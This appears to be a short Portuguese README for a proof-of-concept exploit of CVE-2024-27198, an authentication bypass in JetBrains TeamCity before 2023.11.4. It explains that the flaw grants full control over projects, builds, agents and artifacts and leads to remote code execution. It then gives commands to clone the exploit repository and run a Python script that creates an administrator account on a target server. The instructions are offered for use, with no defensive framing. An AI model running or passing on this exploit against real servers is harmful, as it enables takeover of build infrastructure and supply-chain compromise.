
PoC sobre CVE-2024-27198
No JetBrains TeamCity anterior à versão 2023.11.4, uma bypass de autenticação permite realizar ações de administrador no servidor TeamCity. Um atacante pode obter controle total sobre todos os projetos, builds, agentes e artefatos do TeamCity, e por fim executar um RCE.
git clone https://github.com/jrbH4CK/CVE-2024-27198.git
cd CVE-2024-27198
Para criar uma conta com privilégios de administrador no servidor
python3 cve-2024-27198.py http://example.com username password

